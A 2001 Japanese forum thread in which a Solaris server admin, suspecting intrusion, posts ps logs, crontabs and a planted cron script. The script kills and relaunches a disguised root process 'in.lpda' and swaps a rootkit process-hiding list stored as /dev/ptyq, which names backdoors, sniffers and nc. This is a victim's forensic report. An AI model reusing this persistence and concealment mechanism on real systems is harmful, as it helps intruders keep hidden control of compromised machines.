これは、やられたのでしょうか？

1 ：名無しさん＠お腹いっぱい。 ：2001/03/23(金) 23:03

ＡＤＳＬを使って鯖をたてていますが、
たまに数時間にわたり外部からのPINGが
９０％ロストするので、パケット量を調べました。
パケットが戻って来ない時に計測したら
上りの帯域の224Kbpsの10倍以上の
パケットが発信されていました。
やられた可能性があると思って調べてみました。

パケットは通るけど反応が極端に悪いことがたまにあり、
そういった時にプロセスを見てみたら不審なプロセスがありました。
親プロセスを捜す為にそのまま放置してみてまずは
定期的にcronでpsを記録してみました。
結果が >>2 です。これは、やられたのでしょうか？

2 ：1 ：2001/03/23(金) 23:08

yuichiro@ns/home/yuichiro/cron> date
Fri Mar 23 22:44:58 JST 2001
yuichiro@ns/home/yuichiro/cron> crontab -l
0 * * * * /home/yuichiro/cron/cronuptime
0 1,4,7,10,13,16,19,22 * * * /home/yuichiro/cron/cronps
yuichiro@ns/home/yuichiro/cron> cat /home/yuichiro/cron/cronuptime
#!/bin/csh -f
/usr/ucb/uptime | /usr/local/bin/xargs /bin/echo `/bin/date +%D` >> /home/yuichiro/cron/uptimedata
yuichiro@ns/home/yuichiro/cron> tail -5 /home/yuichiro/cron/uptimedata
03/23/01 6:00pm up 1 day(s), 7:07, 0 users, load average: 0.05, 0.02, 0.02
03/23/01 7:00pm up 1 day(s), 8:07, 0 users, load average: 0.01, 0.01, 0.01
03/23/01 8:00pm up 1 day(s), 9:07, 0 users, load average: 1.82, 1.71, 1.33
03/23/01 9:00pm up 1 day(s), 10:07, 0 users, load average: 1.80, 1.76, 1.70
03/23/01 10:00pm up 1 day(s), 11:07, 1 user, load average: 0.07, 0.15, 0.73
yuichiro@ns/home/yuichiro/cron> cat /home/yuichiro/cron/cronps
#!/bin/csh -f
set fn = ~yuichiro/cron/psdata/`/bin/date +%y%m%d-%H%M%S`
/usr/ucb/ps auxwwe > "$fn"a
/bin/ps -eo uid,pid,ppid,pmem,pcpu,stime,tty,args > "$fn"b
yuichiro@ns/home/yuichiro/cron> cd psdata
yuichiro@ns/home/yuichiro/cron/psdata> ls
010322-220000a 010323-010000a 010323-040000a 010323-070000a 010323-100000a 010323-130000a 010323-160000a 010323-190000a 010323-213533a 010323-220000a
010322-220000b 010323-010000b 010323-040000b 010323-070000b 010323-100000b 010323-130000b 010323-160000b 010323-190000b 010323-213533b 010323-220000b
yuichiro@ns/home/yuichiro/cron/psdata> head -4 010323-213533a
USER PID %CPU %MEM SZ RSS TT S START TIME COMMAND
root 14621 62.6 0.4 1560 1000 ? R 19:36:33 61:35 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
root 214 23.2 1.1 3912 2592 ? S Mar 22 39:21 /usr/sbin/syslogd PATH=/usr/sbin:/usr/bin TZ=Japan
root 234 3.9 0.9 2424 2128 ? S Mar 22 7:12 /usr/sbin/nscd PATH=/usr/sbin:/usr/bin TZ=Japan
yuichiro@ns/home/yuichiro/cron/psdata> grep ./in.lpda *
010323-040000a:root 7163 97.9 0.4 1512 944 ? R 03:39:39 20:17 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-040000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-070000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-100000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-130000a:root 7058 0.1 0.5 1512 1096 ? S 03:10:01 0:00 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-160000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:01 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-190000a:root 7058 0.0 0.5 1512 1096 ? S 03:10:01 0:01 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-213533a:root 14621 62.6 0.4 1560 1000 ? R 19:36:33 61:35 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
010323-213533a:root 7058 0.1 0.5 1512 1096 ? S 03:10:01 0:01 ./in.lpda HOME=/ LOGNAME=root PATH=/usr/sbin:/usr/bin SHELL=/usr/bin/sh TZ=Japan
yuichiro@ns/home/yuichiro/cron/psdata> grep ./in.lpda 010323-213533b
yuichiro@ns/home/yuichiro/cron/psdata> grep 14621 010323-213533b
yuichiro@ns/home/yuichiro/cron/psdata> su

3 ：1 ：2001/03/23(金) 23:08

root@ns/var/spool/cron/crontabs# ls -l
-rw-r--r-- 1 root sys 190 Jul 7 2000 adm
-r--r--r-- 1 root root 750 Jul 7 2000 lp
-r-------- 1 root root 519 Jan 4 00:31 root
-rw-r--r-- 1 root sys 308 Jul 7 2000 sys
-r--r--r-- 1 root sys 214 Jul 7 2000 uucp
root@ns/var/spool/cron/crontabs# cat root | grep -v '^#'
10 3 * * 0,4 /etc/cron.d/logchecker
10 3 * * 0 /usr/lib/newsyslog
15 3 * * 0 /usr/lib/fs/nfs/nfsfind
1 2 * * * [ -x /usr/sbin/rtc ] && /usr/sbin/rtc -c > /dev/null 2>&1
10 3 * * * /etc/cron.d/syschecker
root@ns/etc/cron.d# ls -l
-rwxr--r-- 1 root sys 72 Jan 1 1970 .proto*
prw------- 1 root root 0 Mar 22 18:16 FIFO|
-rw-r--r-- 1 root sys 45 Jul 7 2000 at.deny
-rw-r--r-- 1 root sys 45 Jul 7 2000 cron.deny
-r-xr-xr-x 1 bin bin 1659 Jul 16 1997 logchecker*
-rw-r--r-- 1 root sys 17 Jan 1 1970 queuedefs
-rwxrw-rw- 1 root root 194 Oct 10 1998 syschecker*
root@ns/etc/cron.d# cat syschecker
#!/bin/sh
mv /dev/ptyq /dev/ptyp
ps -fe | grep in.lpda | grep -v grep | awk '{print "kill -9 "$2""}' > tmp3 ; chmod u+x tmp3 ;./tmp3
cd /usr/sbin/
./in.lpda &
rm -rf tmp3
mv /dev/ptyp /dev/ptyq
root@ns/etc/cron.d# lsa /dev/ptyq
-rw-r--r-- 1 root sys 122 Jul 16 1997 /dev/ptyq
root@ns/etc/cron.d# cat /dev/ptyq
rshd
sm.sh
sm
rcp
in.bind
lpNet
login
hub
cl
dpipe
bncsol
nmap
lpdx
lpdi
lpda
ssh
sshd
carko
ident
psybnc
nc
rape
in.lpda
root@ns/usr/sbin# lss in.*
-r-xr-xr-x 1 bin bin 10912 Jul 16 1997 in.comsat*
-rw-rw-rw- 1 bin bin 1 May 7 1998 in.fingerd
-r-xr-xr-x 1 bin bin 50612 Jul 16 1997 in.ftpd*
-rwxr-xr-x 1 bin bin 103200 May 6 1998 in.lpda
-r-xr-xr-x 1 bin bin 140688 Jul 16 1997 in.named*
-r-xr-xr-x 1 bin bin 16888 Jul 16 1997 in.rarpd*
-r-xr-xr-x 1 bin bin 24212 Jul 16 1997 in.rdisc*
-r-xr-xr-x 1 bin bin 11532 Jul 16 1997 in.rexecd*
-r-xr-xr-x 1 bin bin 22524 Jul 16 1997 in.rlogind*
-r-xr-xr-x 1 bin bin 31592 Jul 16 1997 in.routed*
-r-xr-xr-x 1 bin bin 22684 Jul 16 1997 in.rshd*
-r-xr-xr-x 1 bin bin 13988 Jul 16 1997 in.rwhod*
-r-xr-xr-x 1 bin bin 11868 Jul 16 1997 in.talkd*
-r-xr-xr-x 1 bin bin 34176 Jul 16 1997 in.telnetd*
-r-xr-xr-x 1 bin bin 15564 Jul 16 1997 in.tftpd*
-r-xr-xr-x 1 bin bin 6444 Jul 16 1997 in.tnamed*
-r-xr-xr-x 1 uucp uucp 9940 Jul 16 1997 in.uucpd*

read.cgi ver5.26+ (01/10/21-)